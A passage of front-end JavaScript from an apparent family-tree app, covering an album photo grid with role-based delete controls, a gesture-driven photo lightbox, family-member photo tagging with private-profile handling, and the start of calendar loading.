            photoGrid.innerHTML = `<p class="text-gray-500 col-span-full text-center py-8">Loading photos...</p>`;
            try {
                const photos = await apiFetch(`${API_BASE_URL}/albums/${albumId}/photos`);
                if (photos.length === 0) {
                    photoGrid.innerHTML = `<div class="col-span-full">${ebwEmptyState({
                        icon: 'photo',
                        heading: 'No photos in this album',
                        body: 'Upload your first photo to start building this collection.',
                        primaryAction: {
                            label: '+ Upload a photo',
                            onclick: "document.getElementById('album-upload-input')?.click()",
                        },
                        learnMoreAnchor: 'photos',
                    })}</div>`;
                } else {
                    // Fetch signed URLs for all photos
                    const photosWithUrls = await Promise.all(photos.map(async (photo) => {
                        try {
                            const urlResponse = await apiFetch(`${API_BASE_URL}/photos/generate-signed-url`, {
                                method: 'POST',
                                body: { filename: photo.gcs_filename }
                            });
                            return {
                                ...photo,
                                signedUrl: urlResponse.signed_url
                            };
                        } catch (e) {
                            return { ...photo, signedUrl: null };
                        }
                    }));

                    // Store photos for lightbox
                    currentAlbumPhotos = photosWithUrls;

                    // Render photo grid. Tiles are keyboard-navigable
                    // (role=button + tabindex=0 + Enter/Space handler).
                    // Delete button + caption always visible below md:
                    // since touch devices have no hover.
                    //
                    // Prompt 15: delete-per-photo gating:
                    //   - Owner (no sharedRole): every photo shows Delete.
                    //   - Contributor: Delete only on own uploads
                    //     (photo.uploaded_by === current user).
                    //   - Viewer: no Delete on any photo.
                    // Backend enforces the same via delete_photo's
                    // owner-or-uploader check; this is presentation only.
                    const _viewerIsOwner = !_currentAlbumSharedRole;
                    const _viewerIsContrib = _currentAlbumSharedRole === 'contributor';
                    photoGrid.innerHTML = photosWithUrls.map((photo, index) => {
                        const isOwnUpload = photo.uploaded_by === appState.currentUserNeo4jId;
                        const canDelete = _viewerIsOwner || (_viewerIsContrib && isOwnUpload);
                        return `
                        <div class="relative aspect-square bg-gray-100 rounded-lg overflow-hidden group">
                            <div onclick="openPhotoLightbox(${index})"
                                 onkeydown="if(event.key==='Enter'||event.key===' '){event.preventDefault();openPhotoLightbox(${index})}"
                                 role="button" tabindex="0"
                                 aria-label="${escapeHtml(photo.caption || `Photo ${index + 1}`)}"
                                 class="w-full h-full cursor-pointer focus:outline-none focus-visible:ring-2 focus-visible:ring-primary focus-visible:ring-inset">
                                ${photo.signedUrl ?
                                    `<img src="${photo.signedUrl}"
                                         alt="${escapeHtml(photo.caption || 'Family photo')}"
                                         class="w-full h-full object-cover group-hover:scale-110 transition-transform duration-300"
                                         onerror="_imgFallback(this, 'photo')">` :
                                    `<div class="flex items-center justify-center h-full">
                                        ${tablerIcon('photo', { size: 48, preserveColor: true })}
                                    </div>`
                                }
                            </div>
                            ${canDelete ? `
                            <!-- Delete button (top right) -->
                            <button onclick="event.stopPropagation(); deletePhotoFromGrid(${photo.id}, ${index})"
                                    aria-label="Delete photo"
                                    class="absolute top-2 right-2 bg-red-600 hover:bg-red-700 text-white p-2 rounded-full opacity-100 md:opacity-0 md:group-hover:opacity-100 transition-opacity z-10"
                                    title="Delete photo">
                                ${tablerIcon('trash', { size: 16, preserveColor: true })}
                            </button>
                            ` : ''}
                            <!-- Overlay on hover (desktop only — magnifier hint) -->
                            <div class="absolute inset-0 bg-black bg-opacity-0 group-hover:bg-opacity-30 transition-all flex items-center justify-center pointer-events-none">
                                <svg class="w-12 h-12 text-white opacity-0 group-hover:opacity-100 transition-opacity" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                    <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0zM10 7v3m0 0v3m0-3h3m-3 0H7"></path>
                                </svg>
                            </div>
                            ${photo.caption ? `<div class="absolute bottom-0 left-0 right-0 bg-black bg-opacity-60 text-white text-xs p-2 opacity-100 md:opacity-0 md:group-hover:opacity-100 transition-opacity pointer-events-none">${escapeHtml(photo.caption)}</div>` : ''}
                        </div>
                    `;
                    }).join('');
                }
            } catch (e) {
                const errorMessage = e?.message || e?.toString() || 'Unknown error';
                photoGrid.innerHTML = `<p class="text-error col-span-full text-center">Could not load photos: ${escapeHtml(errorMessage)}</p>`;
            }
        }

        // F23: overloaded signature.
        //   openPhotoLightbox(index)                    ← album flow (legacy),
        //     uses the currentAlbumPhotos populated by fetchAndRenderPhotos.
        //     Kept because inline onclick in the photo grid + the window
        //     export both bind to this shape (the F17 dead-buttons lesson —
        //     never break exported signatures without confirming zero
        //     consumers first).
        //   openPhotoLightbox(photos, index, opts)      ← feed flow (F23),
        //     ad-hoc photos array of {signedUrl, caption?, id?}. opts.readOnly
        //     hides the destructive/mutating toolbar (Delete + Tag + AI
        //     Describe) via .lightbox-readonly on the modal + CSS in main.css.
        // Session 2c.1 #1: overlay history-state pattern.
        // Any full-screen overlay that isn't a real view needs to push a
        // synthetic history entry on open so the hardware back gesture pops
        // to that entry, which fires popstate → we close the overlay. Without
        // this, back-button walks past the overlay to the underlying view,
        // then past that to root, then exits the app.
        // Applies to overlays that don't naturally go through openModal (photo
        // lightbox, help drawer). Standard .modal-overlay modals go through
        // openModal which the native-shell back handler catches via class
        // selector — no change needed there.
        function _pushOverlayHistoryEntry(overlayId) {
            const current = window.history.state || {};
            if (current.overlayId === overlayId) return; // Already pushed.
            window.history.pushState(
                { ...current, overlayId, _prevViewId: current.viewId },
                '',
                window.location.hash
            );
        }
        function _popOverlayHistoryEntry(overlayId) {
            const current = window.history.state || {};
            if (current.overlayId === overlayId) {
                // Programmatic close after user's explicit dismiss (X button,
                // swipe-down, etc.). Pop the synthetic entry so history stays
                // clean. history.back() fires popstate — our handler sees the
                // state we're going TO doesn't have this overlayId + skips
                // closing (already closed).
                window.history.back();
            }
        }
        // Registry of overlay-close handlers, keyed by overlayId. popstate
        // handler in app.js dispatches to the matching close function.
        window._ebwOverlayCloseHandlers = window._ebwOverlayCloseHandlers || {};
        window._ebwOverlayCloseHandlers['photo-lightbox'] = () => {
            const modal = document.getElementById('photo-lightbox-modal');
            if (!modal || modal.classList.contains('pointer-events-none')) return false;
            _closePhotoLightboxImpl();
            return true;
        };

        function openPhotoLightbox(photosOrIndex, index, opts) {
            if (typeof photosOrIndex === 'number') {
                currentPhotoIndex = photosOrIndex;
            } else if (Array.isArray(photosOrIndex)) {
                currentAlbumPhotos = photosOrIndex;
                currentPhotoIndex = typeof index === 'number' ? index : 0;
            } else {
                return;
            }
            // 2c.1 #1: push a synthetic history entry so back gesture pops it
            // rather than the underlying view / app-root.
            _pushOverlayHistoryEntry('photo-lightbox');
            // Prompt 15: album-flow opens (index-only signature) consult
            // the module-level sharedRole set by fetchAndRenderPhotos.
            // Viewers get readOnly (same class as F23 feed). Contributors
            // get 'contributor' mode — Delete visible only on own uploads,
            // Tag + AI Describe hidden (owner-only per the role table).
            // Explicit opts.readOnly still wins (feed flow passes it).
            let mode = 'owner';
            if (opts && opts.readOnly) {
                mode = 'viewer';
            } else if (typeof photosOrIndex === 'number' && _currentAlbumSharedRole) {
                mode = _currentAlbumSharedRole; // 'viewer' | 'contributor'
            }
            const readOnly = mode === 'viewer';
            // Reset any leftover tag panel + AI panel state from a prior
            // album-flow open so read-only mode doesn't inherit toggles.
            isTaggingMode = false;
            const tagUI = document.getElementById('tag-people-interface');
            if (tagUI) tagUI.classList.add('hidden');
            const btnText = document.getElementById('tag-people-btn-text');
            if (btnText) btnText.textContent = 'Tag People';
            const aiResult = document.getElementById('ai-photo-result');
            if (aiResult) { aiResult.innerHTML = ''; aiResult.classList.add('hidden'); }
            updateLightboxPhoto();
            const modal = document.getElementById('photo-lightbox-modal');
            if (modal) {
                modal.classList.remove('pointer-events-none', 'opacity-0');
                modal.classList.add('pointer-events-auto', 'opacity-100');
                // Viewers hide the whole action triad via .lightbox-readonly
                // (F23 CSS). Contributors get a different treatment applied
                // in updateLightboxPhoto below (per-photo Delete gate).
                modal.classList.toggle('lightbox-readonly', readOnly);
                modal.classList.toggle('lightbox-contributor', mode === 'contributor');
            }
            // Body scroll lock — matches the RecipientPicker pattern so the
            // page behind the lightbox doesn't scroll on trackpad flicks.
            // Standalone (not through openModal), so guarded via its own
            // saved-overflow marker.
            document.body.dataset.lightboxSavedOverflow = document.body.style.overflow || '';
            document.body.style.overflow = 'hidden';
            _wireLightbox();
        }

        // F23: feed → lightbox tap handler. Reads the per-post photos array
        // from a module-level cache populated at renderFeedPost time so
        // inline onclick doesn't need to carry the array (JSON.stringify of
        // signed URLs in an onclick attribute is a hostile escape surface).
        const _ebwFeedPhotoCache = new Map();
        function openFeedPhotoLightbox(postId, index) {
            const photos = _ebwFeedPhotoCache.get(postId);
            if (!photos || photos.length === 0) return;
            openPhotoLightbox(photos, index, { readOnly: true });
        }
        window.openFeedPhotoLightbox = openFeedPhotoLightbox;

        // Placeholder shown when the lightbox img fails to load (e.g. signed
        // URL expired between /photos response and img.src assignment).
        // data-URI SVG so we don't need to keep a keeping-the-node-alive
        // fallback path in _imgFallback (which REPLACES the node). Matches
        // the visual weight of the _imgFallback 'photo' placeholder — gray
        // box with a Tabler-style photo glyph in muted gray.
        const LIGHTBOX_BROKEN_PLACEHOLDER = 'data:image/svg+xml;charset=utf8,' + encodeURIComponent(
            '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 400 300">' +
            '<rect width="400" height="300" fill="#f3f4f6"/>' +
            '<rect x="160" y="110" width="80" height="80" rx="6" stroke="#9ca3af" stroke-width="4" fill="none"/>' +
            '<circle cx="180" cy="135" r="6" fill="#9ca3af"/>' +
            '<path d="M168 178l16-16 12 12 24-24 20 20" stroke="#9ca3af" stroke-width="4" stroke-linecap="round" stroke-linejoin="round" fill="none"/>' +
            '</svg>'
        );

        // Wire lightbox-scoped JS (pointer-events zoom/pan/swipe + double-tap
        // + img onerror fallback). Attaches once per modal instance via
        // data-lightbox-wired marker; the modal DOM is regenerated on every
        // renderApp so the marker resets naturally on view changes.
        //
        // Gesture ownership per FTV conventions:
        //   - 2-finger pinch: scale [1, 4] around the pointer midpoint.
        //     Pan follows the midpoint delta.
        //   - 1-finger, scale > 1.1: pan the zoomed image. Clamp so image
        //     edge can't pan past the viewport edge by more than 40px.
        //   - 1-finger, scale ≤ 1.1: existing swipe navigation
        //     (|dx| ≥ 50 AND |dx| > |dy|).
        //   - Double-tap: toggle 1 ↔ 2.5 centered on the tap point.
        //
        // touch-action: none in main.css on #lightbox-photo-region suppresses
        // native pinch-zoom / double-tap-zoom / pan so we own the gesture
        // stack cleanly. Pointer events unify touch + mouse + pen. willChange
        // is set only during active gesture — a permanent will-change costs
        // memory on iOS.
        //
        // Img onerror: swap in the data-URI SVG placeholder. Unlike
        // _imgFallback which REPLACES the img node (would break the next
        // updateLightboxPhoto assignment), we keep the img alive and just
        // swap its src. Guard against recursion: if src is already the
        // data-URI placeholder, skip.
        function _wireLightbox() {
            const modal = document.getElementById('photo-lightbox-modal');
            if (!modal || modal.dataset.lightboxWired === 'true') return;
            modal.dataset.lightboxWired = 'true';

            const region = document.getElementById('lightbox-photo-region');
            const img = document.getElementById('lightbox-image');

            if (region) _wireLightboxGestures(region, img);

            if (img) {
                img.addEventListener('error', () => {
                    if (typeof img.src === 'string' && img.src.startsWith('data:image')) return;
                    img.src = LIGHTBOX_BROKEN_PLACEHOLDER;
                });
            }
        }

        function _wireLightboxGestures(region, img) {
            const pointers = new Map();
            // gesture: null | 'pan' | 'pinch'  (null = tap/swipe candidate)
            let gesture = null;
            let startDist = 0;
            let startScale = 1;
            let startTx = 0;
            let startTy = 0;
            let startCenterX = 0;
            let startCenterY = 0;
            let downT = 0;
            let downX = 0;
            let downY = 0;
            let lastTapT = 0;
            let lastTapX = 0;
            let lastTapY = 0;

            function markActive() { if (img) img.style.willChange = 'transform'; }
            function markIdle() { if (img) img.style.willChange = ''; }

            function pointerCenter() {
                const arr = [...pointers.values()];
                if (arr.length === 0) return { x: 0, y: 0 };
                const cx = arr.reduce((s, p) => s + p.x, 0) / arr.length;
                const cy = arr.reduce((s, p) => s + p.y, 0) / arr.length;
                return { x: cx, y: cy };
            }
            function pointerDist() {
                const arr = [...pointers.values()];
                if (arr.length < 2) return 0;
                return Math.hypot(arr[0].x - arr[1].x, arr[0].y - arr[1].y);
            }
            function clampPan(tx, ty) {
                if (!img || _lbScale <= 1) return { tx: 0, ty: 0 };
                const naturalW = img.offsetWidth || 1;
                const naturalH = img.offsetHeight || 1;
                const scaledW = naturalW * _lbScale;
                const scaledH = naturalH * _lbScale;
                const vw = window.innerWidth;
                const vh = window.innerHeight;
                const rangeX = Math.max(0, (scaledW - vw) / 2);
                const rangeY = Math.max(0, (scaledH - vh) / 2);
                return {
                    tx: Math.max(-rangeX - 40, Math.min(rangeX + 40, tx)),
                    ty: Math.max(-rangeY - 40, Math.min(rangeY + 40, ty)),
                };
            }

            region.addEventListener('pointerdown', (e) => {
                pointers.set(e.pointerId, { x: e.clientX, y: e.clientY });
                try { region.setPointerCapture(e.pointerId); } catch (err) {}

                markActive();

                if (pointers.size === 1) {
                    downT = Date.now();
                    downX = e.clientX;
                    downY = e.clientY;
                    // Stay in tap/swipe candidate mode. Promote to 'pan' only
                    // on first meaningful pointermove while zoomed. Otherwise
                    // a quick tap while zoomed never reaches double-tap
                    // detection because pointerup only fires the tap branch
                    // when gesture is still null.
                    gesture = null;
                    startTx = _lbTx;
                    startTy = _lbTy;
                    startCenterX = e.clientX;
                    startCenterY = e.clientY;
                } else if (pointers.size === 2) {
                    gesture = 'pinch';
                    startDist = pointerDist() || 1;
                    startScale = _lbScale;
                    startTx = _lbTx;
                    startTy = _lbTy;
                    const c = pointerCenter();
                    startCenterX = c.x;
                    startCenterY = c.y;
                }
            });

            region.addEventListener('pointermove', (e) => {
                if (!pointers.has(e.pointerId)) return;
                pointers.set(e.pointerId, { x: e.clientX, y: e.clientY });

                if (gesture === 'pinch' && pointers.size >= 2) {
                    const dist = pointerDist();
                    const c = pointerCenter();
                    const newScale = Math.max(1, Math.min(4, startScale * (dist / startDist)));
                    const dx = c.x - startCenterX;
                    const dy = c.y - startCenterY;
                    _lbScale = newScale;
                    const clamped = clampPan(startTx + dx, startTy + dy);
                    _lbTx = clamped.tx;
                    _lbTy = clamped.ty;
                    _applyLightboxTransform();
                } else if (pointers.size === 1) {
                    const dx = e.clientX - startCenterX;
                    const dy = e.clientY - startCenterY;
                    // Promote to 'pan' on first meaningful move while zoomed.
                    // 6px threshold suppresses accidental micro-drags from
                    // finger jitter during a tap.
                    if (gesture === null && _lbScale > 1.1 && (Math.abs(dx) > 6 || Math.abs(dy) > 6)) {
                        gesture = 'pan';
                    }
                    if (gesture === 'pan') {
                        const clamped = clampPan(startTx + dx, startTy + dy);
                        _lbTx = clamped.tx;
                        _lbTy = clamped.ty;
                        _applyLightboxTransform();
                    }
                }
            });

            function endPointer(e) {
                if (!pointers.has(e.pointerId)) { if (pointers.size === 0) markIdle(); return; }
                pointers.delete(e.pointerId);
                try { region.releasePointerCapture(e.pointerId); } catch (err) {}

                if (pointers.size === 0) {
                    // Last pointer up — finalize tap / double-tap / swipe.
                    const totalDx = e.clientX - downX;
                    const totalDy = e.clientY - downY;
                    const absDx = Math.abs(totalDx);
                    const absDy = Math.abs(totalDy);
                    const dt = Date.now() - downT;

                    // Tap window is generous on movement + time: iPhone finger
                    // taps often drift 8-14px and pointermove may promote
                    // gesture='pan' even though the user meant to tap. If the
                    // total movement was still small enough to be a tap, treat
                    // it as one (undoing any small pan drift applied during
                    // move via _lbTx/_lbTy snap-back below).
                    const looksLikeTap = absDx < 15 && absDy < 15 && dt < 400;
                    const canBeTap = looksLikeTap && (gesture === null || gesture === 'pan');

                    if (canBeTap) {
                        const now = Date.now();
                        const isDoubleTap = now - lastTapT < 400
                            && Math.abs(e.clientX - lastTapX) < 40
                            && Math.abs(e.clientY - lastTapY) < 40;
                        if (isDoubleTap) {
                            // Double-tap: toggle 1 ↔ 2.5 centered on tap point.
                            if (_lbScale > 1.1) {
                                _lbScale = 1;
                                _lbTx = 0;
                                _lbTy = 0;
                            } else {
                                _lbScale = 2.5;
                                // Position so the tap point stays fixed.
                                // At transform-origin center, a point (px, py)
                                // relative to the img center (cx, cy) at scale=1
                                // moves to (cx + tx + (px-cx)*s, cy + ty + (py-cy)*s).
                                // Solving for (tx, ty) to hold (px, py) fixed:
                                // tx = (cx - px) * (s - 1).
                                const rect = img.getBoundingClientRect();
                                const cx = rect.left + rect.width / 2;
                                const cy = rect.top + rect.height / 2;
                                const tx = (cx - e.clientX) * (2.5 - 1);
                                const ty = (cy - e.clientY) * (2.5 - 1);
                                const clamped = clampPan(tx, ty);
                                _lbTx = clamped.tx;
                                _lbTy = clamped.ty;
                            }
                            _applyLightboxTransform();
                            lastTapT = 0;
                        } else {
                            // Single tap. If we were mid-pan and applied some
                            // drift, snap back to the start position so a tap
                            // never accidentally leaves the image displaced.
                            if (gesture === 'pan') {
                                _lbTx = startTx;
                                _lbTy = startTy;
                                _applyLightboxTransform();
                            }
                            lastTapT = now;
                            lastTapX = e.clientX;
                            lastTapY = e.clientY;
                        }
                    } else if (gesture === null && _lbScale <= 1.1 && absDx >= 50 && absDx > absDy) {
                        // Swipe navigation gate: only when NOT zoomed and NOT
                        // mid-pan. Fixes the pre-F18 bug where swipes stole
                        // pans after a zoom.
                        navigatePhoto(totalDx < 0 ? 1 : -1);
                    } else if (gesture === null && _lbScale <= 1.1 && totalDy >= 80 && absDy > absDx) {
                        // Session 2c.1 #1: swipe-down-to-dismiss. Only when
                        // NOT zoomed (pan gestures shouldn't be stolen) and
                        // vertical dominates horizontal. Matches iOS/Android
                        // photo viewer convention.
                        closePhotoLightbox();
                    }
                    gesture = null;
                    markIdle();
                } else if (pointers.size === 1 && gesture === 'pinch') {
                    // 2→1 finger transition mid-pinch: continue as pan on the
                    // remaining finger from its current position.
                    const remaining = [...pointers.values()][0];
                    gesture = 'pan';
                    startTx = _lbTx;
                    startTy = _lbTy;
                    startCenterX = remaining.x;
                    startCenterY = remaining.y;
                }
            }

            region.addEventListener('pointerup', endPointer);
            region.addEventListener('pointercancel', endPointer);
        }

        // Public close — pops the synthetic history entry so back/forward
        // stay coherent. popstate then fires and calls _closePhotoLightboxImpl.
        // If the history entry isn't ours (edge case: opened without pushing),
        // fall through to direct close.
        function closePhotoLightbox() {
            const current = window.history.state || {};
            if (current.overlayId === 'photo-lightbox') {
                _popOverlayHistoryEntry('photo-lightbox');
            } else {
                _closePhotoLightboxImpl();
            }
        }
        function _closePhotoLightboxImpl() {
            const modal = document.getElementById('photo-lightbox-modal');
            if (modal) {
                modal.classList.add('pointer-events-none', 'opacity-0');
                // Prompt 15: also clear the contributor + per-photo-hide
                // classes so a subsequent owner-flow open doesn't inherit
                // stale mode state.
                modal.classList.remove('pointer-events-auto', 'opacity-100', 'lightbox-readonly', 'lightbox-contributor', 'lightbox-hide-delete');
            }
            // Release the body scroll lock. If a modal is stacked (openModal
            // increments its own counter), it manages its own restoration.
            if ('lightboxSavedOverflow' in document.body.dataset) {
                document.body.style.overflow = document.body.dataset.lightboxSavedOverflow || '';
                delete document.body.dataset.lightboxSavedOverflow;
            }
            // Reset zoom so reopening the lightbox lands at 1x.
            _resetLightboxZoom();
        }

        function navigatePhoto(direction) {
            if (currentAlbumPhotos.length === 0) return;
            currentPhotoIndex += direction;
            if (currentPhotoIndex < 0) currentPhotoIndex = currentAlbumPhotos.length - 1;
            if (currentPhotoIndex >= currentAlbumPhotos.length) currentPhotoIndex = 0;
            updateLightboxPhoto();
        }

        function updateLightboxPhoto() {
            if (currentAlbumPhotos.length === 0) return;
            const photo = currentAlbumPhotos[currentPhotoIndex];
            const img = document.getElementById('lightbox-image');
            const caption = document.getElementById('lightbox-caption');
            const counter = document.getElementById('lightbox-counter');
            const modal = document.getElementById('photo-lightbox-modal');

            // Reset zoom to 1x centered on every photo switch so the next
            // photo doesn't inherit the previous photo's pan/zoom state.
            _resetLightboxZoom();

            if (img) {
                img.src = photo.signedUrl || '';
                img.alt = photo.caption || 'Family photo';
            }
            if (caption) caption.textContent = photo.caption || '';
            if (counter) counter.textContent = `${currentPhotoIndex + 1} / ${currentAlbumPhotos.length}`;

            // Prompt 15: contributor-mode per-photo Delete gating.
            // Only own uploads show the Delete button; navigating
            // to another user's photo hides it. The modal class
            // toggles + CSS in main.css handle the visibility.
            // Viewer mode is already handled at open time via
            // .lightbox-readonly (hides the whole action triad).
            if (modal && modal.classList.contains('lightbox-contributor')) {
                const isOwnUpload = photo.uploaded_by === appState.currentUserNeo4jId;
                modal.classList.toggle('lightbox-hide-delete', !isOwnUpload);
            } else if (modal) {
                // Owner + viewer paths: never apply the per-photo hide.
                modal.classList.remove('lightbox-hide-delete');
            }

            // Clear and hide AI result when switching photos
            const aiResult = document.getElementById('ai-photo-result');
            if (aiResult) {
                aiResult.innerHTML = '';
                aiResult.classList.add('hidden');
            }

            // Load tags for this photo
            loadPhotoTags();
        }

        // Photo Tagging Functions
        let isTaggingMode = false;

        async function togglePhotoTagging() {
            isTaggingMode = !isTaggingMode;
            const tagUI = document.getElementById('tag-people-interface');
            const btnText = document.getElementById('tag-people-btn-text');

            if (isTaggingMode) {
                // Show tagging interface
                tagUI.classList.remove('hidden');
                if (btnText) btnText.textContent = 'Done Tagging';

                // Load family members
                await loadFamilyMembersForTagging();
            } else {
                // Hide tagging interface
                tagUI.classList.add('hidden');
                if (btnText) btnText.textContent = 'Tag People';
            }
        }

        async function loadFamilyMembersForTagging() {
            const selector = document.getElementById('tag-people-selector');
            if (!selector) return;

            // Data-dependency guard: appState.personsInTree is only populated
            // by loadFamilyTreeData(). A Photos-first session (user opens the
            // app, goes straight to Photos) hasn't touched FTV so the array
            // is empty — the tag panel used to show "No family members found"
            // in that case. Load it lazily here. loadFamilyTreeData is safe
            // off-FTV (guards on #tree-display) and idempotent otherwise.
            if ((appState.personsInTree || []).length === 0) {
                selector.innerHTML = '<p class="text-gray-500 text-sm px-3 py-2">Loading family members…</p>';
                try {
                    await loadFamilyTreeData();
                } catch (e) {
                    console.error('Failed to load family tree data for tagging:', e);
                    // Fall through — members check below will handle empty array
                }
            }

            try {
                const members = appState.personsInTree || [];

                if (members.length === 0) {
                    selector.innerHTML = '<p class="text-gray-500 text-sm px-3 py-2">No family members found</p>';
                    return;
                }

                // Persons carry snake_case field names (first_name / last_name)
                // per the backend serializer. Render name as escaped text
                // content, keep only person id in the DOM via data-person-id
                // — apostrophe-safe (N'Guessan) and XSS-safe. One delegated
                // click listener on the selector reads data-person-id and
                // resolves the person from appState.personsInTree fresh at
                // click time.
                selector.innerHTML = members.map(person => {
                    const fullName = `${(person.first_name || '').trim()} ${(person.last_name || '').trim()}`.trim() || 'Unnamed person';
                    return `<button
                                type="button"
                                data-person-id="${person.id}"
                                class="w-full text-left px-3 py-2 bg-gray-50 hover:bg-blue-50 rounded-md transition-colors min-h-[44px]"
                            >${escapeHtml(fullName)}</button>`;
                }).join('');

                // Delegated click handler on the selector. Idempotency guard
                // via data-tag-click-wired so we attach only once even if
                // loadFamilyMembersForTagging fires multiple times per modal
                // instance (open/close/reopen).
                if (selector.dataset.tagClickWired !== 'true') {
                    selector.dataset.tagClickWired = 'true';
                    selector.addEventListener('click', (e) => {
                        const btn = e.target.closest('button[data-person-id]');
                        if (!btn) return;
                        const personId = parseInt(btn.dataset.personId, 10);
                        if (Number.isNaN(personId)) return;
                        const person = (appState.personsInTree || []).find(p => p.id === personId);
                        if (!person) return;
                        const fullName = `${(person.first_name || '').trim()} ${(person.last_name || '').trim()}`.trim() || 'Unnamed person';
                        tagPersonInPhoto(personId, fullName);
                    });
                }
            } catch (error) {
                console.error('Error loading family members for tagging:', error);
                selector.innerHTML = '<p class="text-red-500 text-sm px-3 py-2">Error loading family members</p>';
            }
        }

        async function tagPersonInPhoto(personId, personName) {
            if (currentAlbumPhotos.length === 0) return;
            const photo = currentAlbumPhotos[currentPhotoIndex];

            try {
                // Add tag via API (default position: center of photo)
                const response = await apiFetch(`${API_BASE_URL}/photos/${photo.id}/tags`, {
                    method: 'POST',
                    body: {
                        personId: personId,
                        x: 50,
                        y: 50
                    }
                });

                // Refresh tags display
                await loadPhotoTags();

                // Close tagging interface
                togglePhotoTagging();

                _ebwToast(`Tagged ${personName} ✓`);
            } catch (error) {
                console.error('Error tagging person:', error);
                _ebwToast('Error tagging person: ' + error.message, { tone: 'error' });
            }
        }

        async function loadPhotoTags() {
            if (currentAlbumPhotos.length === 0) return;
            const photo = currentAlbumPhotos[currentPhotoIndex];
            const tagsList = document.getElementById('tagged-people-list');

            if (!tagsList) return;

            try {
                const response = await apiFetch(`${API_BASE_URL}/photos/${photo.id}/tags`);
                const tags = response.tags || [];

                if (tags.length === 0) {
                    tagsList.innerHTML = '';
                    return;
                }

                // Prompt 15: Phase-3 private treatment for tag pills.
                // A tagged Person with privacy_mode === 'private' renders
                // as "Private profile" instead of their full name UNLESS
                // the viewer is the claimant (owner of that Person).
                // Backend surfaces privacy_mode + claimed_by_user_id on
                // each tag (Prompt 15 backend companion). Remove button
                // (×) stays owner-only per role table — for shared
                // recipients (viewer / contributor) the ×  is hidden.
                const _viewerCanEditTags = !_currentAlbumSharedRole; // owner only
                const tagNames = tags.map(tag => {
                    const isPrivate = tag.privacy_mode === 'private'
                        && tag.claimed_by_user_id !== appState.currentUserNeo4jId;
                    const nameHtml = isPrivate
                        ? `<span class="inline-flex items-center gap-1">
                               <svg class="ebw-lock-glyph" viewBox="0 0 24 24" width="10" height="10" aria-hidden="true"><path fill="currentColor" d="M12 2a5 5 0 00-5 5v3H6a2 2 0 00-2 2v8a2 2 0 002 2h12a2 2 0 002-2v-8a2 2 0 00-2-2h-1V7a5 5 0 00-5-5zm-3 8V7a3 3 0 116 0v3H9z"/></svg>
                               <span class="italic opacity-90">Private profile</span>
                           </span>`
                        : escapeHtml(tag.fullName || '');
                    const removeBtn = _viewerCanEditTags
                        ? `<button onclick="removePhotoTag(${tag.personId})" class="hover:text-red-300 ml-1">×</button>`
                        : '';
                    return `<span class="inline-flex items-center gap-1 bg-blue-600 px-2 py-1 rounded-md">
                        ${nameHtml}
                        ${removeBtn}
                    </span>`;
                }).join(' ');

                tagsList.innerHTML = `<div class="flex flex-wrap gap-2 justify-center">
                    <span class="text-gray-300">Tagged:</span> ${tagNames}
                </div>`;
            } catch (error) {
                console.error('Error loading photo tags:', error);
                tagsList.innerHTML = '';
            }
        }

        async function removePhotoTag(personId) {
            if (!confirm('Remove this person from the photo?')) return;

            if (currentAlbumPhotos.length === 0) return;
            const photo = currentAlbumPhotos[currentPhotoIndex];

            try {
                await apiFetch(`${API_BASE_URL}/photos/${photo.id}/tags/${personId}`, {
                    method: 'DELETE'
                });

                // Refresh tags display
                await loadPhotoTags();

                _ebwToast('Tag removed');
            } catch (error) {
                console.error('Error removing tag:', error);
                _ebwToast('Error removing tag: ' + error.message, { tone: 'error' });
            }
        }

        // Keyboard navigation for lightbox
        document.addEventListener('keydown', (e) => {
            const modal = document.getElementById('photo-lightbox-modal');
            if (!modal || modal.classList.contains('pointer-events-none')) return;

            if (e.key === 'Escape') closePhotoLightbox();
            if (e.key === 'ArrowLeft') navigatePhoto(-1);
            if (e.key === 'ArrowRight') navigatePhoto(1);
        });
        // Calendar state
        let currentCalendarDate = new Date();
        let currentCalendarView = 'month';
        let calendarEventsCache = [];
        let visibleCalendars = new Set();

        async function fetchAndRenderCalendars() {
            const calendarListDiv = document.getElementById('calendar-list');
            if (!calendarListDiv) return;
            calendarListDiv.innerHTML = `<p class="text-sm text-gray-500">Loading calendars...</p>`;
            try {
                const calendars = await apiFetch(`${API_BASE_URL}/users/${appState.currentUserNeo4jId}/calendars`);
                appState.calendars = calendars;

                // Initialize all calendars as visible
                visibleCalendars = new Set(calendars.map(c => c.id));

                if (calendars.length === 0) {
                    calendarListDiv.innerHTML = '<p class="text-sm text-gray-500">No calendars found.</p>';
                } else {
                    // Render calendar list with checkboxes
                    calendarListDiv.innerHTML = calendars.map(c => {
                        const color = c.type === 'personal' ? 'bg-blue-500' : 'bg-green-500';
                        const icon = c.type === 'personal' ? tablerIcon('calendar', { size: 14 }) : tablerIcon('users', { size: 14 });
                        return `
                            <label class="flex items-center gap-2 p-2 hover:bg-gray-50 rounded cursor-pointer">
                                <input type="checkbox"
                                       checked
                                       onchange="toggleCalendarVisibility(${c.id})"
                                       class="rounded border-gray-300">
                                <span class="w-3 h-3 rounded-full ${color}"></span>
                                <span class="text-sm flex-1">${icon} ${escapeHtml(c.name)}</span>
                            </label>
                        `;
                    }).join('');
                }

                // Update modal select
                const select = document.getElementById('event-calendar');
                if (select) {
                    select.innerHTML = calendars.map(c => `<option value="${c.id}">${escapeHtml(c.name)}</option>`).join('');
                }

                // Load all events for all calendars
                await loadAllCalendarEvents();
                renderCurrentCalendarView();
                renderUpcomingEvents();

            } catch (e) {
                calendarListDiv.innerHTML = `<p class="text-error text-sm">${escapeHtml(e.message)}</p>`;
            }
        }
        async function loadAllCalendarEvents() {
            calendarEventsCache = [];
            try {
                for (const calendar of appState.calendars) {
                    const events = await apiFetch(`${API_BASE_URL}/calendars/${calendar.id}/events`);
                    events.forEach(event => {
                        calendarEventsCache.push({
                            ...event,
                            calendarId: calendar.id,
                            calendarName: calendar.name,
                            calendarType: calendar.type
                        });
                    });
                }
            } catch (e) {
                console.error('Error loading calendar events:', e);
            }
        }

        function toggleCalendarVisibility(calendarId) {
            if (visibleCalendars.has(calendarId)) {
                visibleCalendars.delete(calendarId);
            } else {
                visibleCalendars.add(calendarId);
            }
            renderCurrentCalendarView();
        }

        function switchCalendarView(view) {
            currentCalendarView = view;

            const monthBtn = document.getElementById('month-view-btn');
            const agendaBtn = document.getElementById('agenda-view-btn');
